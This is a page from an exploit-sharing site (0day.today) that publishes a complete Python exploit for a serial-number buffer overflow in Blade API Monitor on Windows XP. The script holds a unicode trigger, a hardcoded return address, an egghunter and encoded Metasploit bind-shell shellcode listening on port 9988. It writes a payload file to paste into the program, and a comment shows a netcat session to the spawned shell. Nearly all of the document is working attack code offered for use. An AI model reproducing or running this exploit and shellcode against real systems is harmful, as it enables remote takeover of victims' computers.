0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Blade API Monitor Unicode Bypass (Serial Number BOF)
[#!/usr/bin/python -w #---------------------------------------------------------------------------------# # Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF) # # Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com # # http://www.fuzzysecurity.com/exploits/8.html # # OS: WinXP PRO SP3 # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/ # # f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe # # # # Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/ # #---------------------------------------------------------------------------------# # This is a super strange exploit. First I would like to commend "FullMetalFouad" # # for the unicode work on the original exploit. Originally I wanted to see if I # # could simplify the process. While I was doing that I lost sight of the fact # # that the instructions had to be printable since we need to copy them from a # # text file. When I opened my POC I saw that all the characters had been # # converted to weird blocks (check my site for a screenshot). On a whim I tried # # to paste these characters in the serial number field and amazingly the buffer # # in the debugger was intact but with one important difference, the unicode had # # been converted back to regular ASCII!! Very strange but super fortunate!! If # # you want to experiment with the exploit just keep in mind to (1) open it in # # windows notepad and (2) that all the characters need to be converted to those # # blocks for it to work (depending on your buffer this isn't always the case). # #---------------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.128 9988 # # (UNKNOWN) [192.168.111.128] 9988 (?) open # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # C:\Program Files\BladeAPIMonitor>ipconfig # # ipconfig # # # # Windows IP Configuration # # # # # # Ethernet adapter Local Area Connection: # # # # Connection-specific DNS Suffix . : localdomain # # IP Address. . . . . . . . . . . . : 192.168.111.128 # # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # # Default Gateway . . . . . . . . . : # # # # C:\Program Files\BladeAPIMonitor> # #---------------------------------------------------------------------------------# filename="PasteMe.txt" #---------------------------------------------------------------------------------# # Originally unicode instructions to put an address in EAX, here it is used to # # trigger notepad bug and get UNICODE => ASCII conversion... # #---------------------------------------------------------------------------------# UniKill = ( "\xB8\x06\xAA\x6F\x50" "\x6F\x4C\x6F\x58\x6F" "\x05\x73\x00\x6F\xB0" "\xB9\xD8\xAA\x6F\xE8") #Egghunter - Marker b33f #Size 32-bytes hunter = ( "\x66\x81\xca\xff" "\x0f\x42\x52\x6a" "\x02\x58\xcd\x2e" "\x3c\x05\x5a\x74" "\xef\xb8\x62\x33" #b3 "\x33\x66\x8b\xfa" #3f "\xaf\x75\xea\xaf" "\x75\xe7\xff\xe7") #msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c #Size 742-bytes shellcode = ( "\xd9\xe1\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58" "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c" "\x48\x68\x4b\x39\x37\x70\x45\x50\x53\x30\x71\x70\x4f\x79\x69" "\x75\x34\x71\x79\x42\x53\x54\x4c\x4b\x71\x42\x64\x70\x6c\x4b" "\x42\x72\x66\x6c\x6c\x4b\x73\x62\x57\x64\x4e\x6b\x73\x42\x36" "\x48\x36\x6f\x4f\x47\x71\x5a\x44\x66\x56\x51\x49\x6f\x75\x61" "\x69\x50\x4c\x6c\x45\x6c\x61\x71\x61\x6c\x63\x32\x44\x6c\x47" "\x50\x49\x51\x6a\x6f\x56\x6d\x55\x51\x49\x57\x4b\x52\x58\x70" "\x62\x72\x76\x37\x4e\x6b\x56\x32\x34\x50\x6c\x4b\x47\x32\x37" "\x4c\x73\x31\x5a\x70\x6c\x4b\x61\x50\x62\x58\x4d\x55\x49\x50" "\x63\x44\x50\x4a\x36\x61\x5a\x70\x50\x50\x6e\x6b\x33\x78\x74" "\x58\x4c\x4b\x63\x68\x57\x50\x45\x51\x4a\x73\x38\x63\x67\x4c" "\x42\x69\x4e\x6b\x56\x54\x6c\x4b\x47\x71\x7a\x76\x35\x61\x59" "\x6f\x56\x51\x49\x50\x6e\x4c\x6b\x71\x4a\x6f\x46\x6d\x67\x71" "\x48\x47\x46\x58\x59\x70\x62\x55\x4a\x54\x56\x63\x43\x4d\x79" "\x68\x75\x6b\x73\x4d\x46\x44\x63\x45\x4b\x52\x61\x48\x6e\x6b" "\x70\x58\x46\x44\x65\x51\x4b\x63\x32\x46\x4c\x4b\x44\x4c\x50" "\x4b\x4c\x4b\x46\x38\x77\x6c\x65\x51\x6b\x63\x4c\x4b\x76\x64" "\x6e\x6b\x56\x61\x38\x50\x6e\x69\x32\x64\x76\x44\x44\x64\x71" "\x4b\x71\x4b\x75\x31\x73\x69\x72\x7a\x72\x71\x59\x6f\x59\x70" "\x76\x38\x63\x6f\x51\x4a\x4c\x4b\x74\x52\x78\x6b\x4e\x66\x71" "\x4d\x51\x78\x67\x43\x46\x52\x37\x70\x43\x30\x31\x78\x71\x67" "\x51\x63\x35\x62\x71\x4f\x76\x34\x42\x48\x50\x4c\x53\x47\x31" "\x36\x54\x47\x69\x6f\x49\x45\x68\x38\x4e\x70\x37\x71\x67\x70" "\x35\x50\x37\x59\x7a\x64\x52\x74\x50\x50\x63\x58\x51\x39\x4b" "\x30\x30\x6b\x75\x50\x39\x6f\x69\x45\x32\x70\x76\x30\x42\x70" "\x66\x30\x73\x70\x62\x70\x31\x50\x42\x70\x43\x58\x49\x7a\x64" "\x4f\x4b\x6f\x39\x70\x59\x6f\x5a\x75\x6b\x39\x78\x47\x30\x31" "\x49\x4b\x62\x73\x33\x58\x74\x42\x43\x30\x65\x77\x53\x34\x4c" "\x49\x4a\x46\x70\x6a\x44\x50\x46\x36\x56\x37\x63\x58\x79\x52" "\x39\x4b\x34\x77\x55\x37\x6b\x4f\x38\x55\x62\x73\x76\x37\x53" "\x58\x6f\x47\x4b\x59\x37\x48\x6b\x4f\x69\x6f\x58\x55\x72\x73" "\x30\x53\x53\x67\x50\x68\x54\x34\x78\x6c\x65\x6b\x6b\x51\x39" "\x6f\x6e\x35\x61\x47\x6c\x49\x78\x47\x73\x58\x31\x65\x70\x6e" "\x30\x4d\x45\x31\x79\x6f\x49\x45\x43\x58\x50\x63\x70\x6d\x43" "\x54\x67\x70\x4d\x59\x39\x73\x76\x37\x53\x67\x32\x77\x56\x51" "\x69\x66\x30\x6a\x52\x32\x36\x39\x33\x66\x6a\x42\x6b\x4d\x62" "\x46\x6b\x77\x30\x44\x34\x64\x35\x6c\x43\x31\x67\x71\x4c\x4d" "\x50\x44\x74\x64\x32\x30\x6f\x36\x75\x50\x53\x74\x70\x54\x32" "\x70\x70\x56\x56\x36\x76\x36\x62\x66\x76\x36\x72\x6e\x36\x36" "\x52\x76\x71\x43\x30\x56\x73\x58\x64\x39\x7a\x6c\x35\x6f\x6c" "\x46\x59\x6f\x6e\x35\x6b\x39\x59\x70\x70\x4e\x51\x46\x47\x36" "\x39\x6f\x34\x70\x55\x38\x44\x48\x6c\x47\x37\x6d\x33\x50\x49" "\x6f\x4a\x75\x6d\x6b\x5a\x50\x6f\x45\x79\x32\x72\x76\x55\x38" "\x4f\x56\x4d\x45\x4f\x4d\x4f\x6d\x6b\x4f\x69\x45\x47\x4c\x67" "\x76\x43\x4c\x55\x5a\x6d\x50\x79\x6b\x4d\x30\x51\x65\x33\x35" "\x4f\x4b\x62\x67\x37\x63\x31\x62\x62\x4f\x53\x5a\x37\x70\x76" "\x33\x49\x6f\x4b\x65\x41\x41") #---------------------------------------------------------------------------------# # (*) Due to the wierd conversion i couldn't do proper badchar analysis # # (1) 0x00425e04 : push esp # ret | startnull,ascii ==> BladeAPIMonitor.exe # # (2) egghunter: We do this because we need more space than we have at ESP # # (3) alpha mixed Bindshell port 9988 # #---------------------------------------------------------------------------------# egg = "\x90"*18 + hunter evil = "\x90"*10 + "b33f"*2 + shellcode buffer = UniKill + "A"*560 + "\x04\x5E\x42\x00" + egg + "B"*500 + evil textfile = open(filename , 'w') textfile.write(buffer) textfile.close() # 0day.today [2024-11-15] #